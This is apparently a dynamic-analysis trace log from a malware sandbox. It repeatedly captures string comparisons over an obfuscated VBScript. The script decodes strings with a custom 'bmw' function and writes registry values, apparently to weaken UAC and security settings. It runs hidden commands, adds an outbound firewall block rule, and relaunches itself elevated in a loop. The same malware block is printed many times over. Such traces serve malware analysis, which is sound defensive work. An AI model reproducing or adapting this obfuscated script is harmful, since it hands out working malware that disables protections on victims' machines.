bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0223.028] wcsncmp (_String1="me = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0223.029] wcsncmp (_String1="e = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.029] wcsncmp (_String1=" = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0223.029] wcsncmp (_String1="= str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0223.029] wcsncmp (_String1=" str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 